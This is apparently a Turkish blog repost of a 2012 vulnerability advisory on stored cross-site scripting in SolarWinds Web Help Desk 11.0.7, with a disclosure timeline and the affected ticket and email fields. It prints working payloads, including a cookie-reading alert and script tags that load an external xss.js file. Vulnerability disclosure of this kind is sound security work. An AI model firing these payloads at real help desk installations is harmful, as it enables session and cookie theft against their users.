Web Help Desk by SolarWinds – Stored XSS

Web Help Desk by SolarWinds scriptinde xss açığı bulundu. Açık sayesinde iframe ve javascript kodları çalıştırmak mümkün.

# Author: loneferret of Offensive Security
# Product: Web Help Desk by SolarWinds
# Version: 11.0.7 (older versions may be affected)
# Vendor Site: http://www.webhelpdesk.com
# Software Download: http://www.webhelpdesk.com/help-desk-software/

# Discovered: August 18th 2012
# Disclosure:
# August 19th 2012: Reported to CERT
# August 24th 2012: Public disclosure date is October 8th 2012
# August 28th 2012: Vendor responded, should fix by disclosure date
# August 29th 2012: Vendor asked information on Stored XSS in 'Rejected E-Mail Section'
# August 29th 2012: Sent vendor instructions on how to trigger XSS (not fully documented here)*
# September 21 2012: Vendor sends pre-release version to test (11.0.8)
# September 23 2012: Replied. Still XSS in "Rejected E-Mail Section' but not in Tickets
# September 24 2012: Vendor replied saying "Rejected E-Mail" XSS slated to be fix in next version
# October 8th 2012: Public release

# Vulnerabilities:
# Stored XSS via client web ticket submit system
# Effected fields: Subject & Request Details
# Payload:<script type="text/javascript">// <![CDATA[
alert(document.cookie);
// ]]></script>

# Stored XSS via E-Mail
# Tickets created automatically vis e-mail will also trigger the XSS when viewing.
# Following payloads are triggered with default regular expression filters
# Body field
# Payloads:
<script type="text/javascript" src="http://ha.ckers.org/xss.js"></script></pre>

<iframe src="javascript:alert('XSS Body');" width="320" height="240"></iframe>

<pre>

# Subject field
# Payloads:
**
<script type="text/javascript" src="http://ha.ckers.org/xss.js"></script></pre>
<iframe src="javascript:alert('XSS Subject');" width="320" height="240"></iframe>
<pre>

# *Viewing rejected e-mails via the 'email.eml' in the "Raw Message Data" section.
# Some payloads:
#<script type="text/javascript" src="http://ha.ckers.org/xss.js">// <![CDATA[

# <XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

# **To trigger XSS must click on "My Tickets" or "Group Tickets"

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir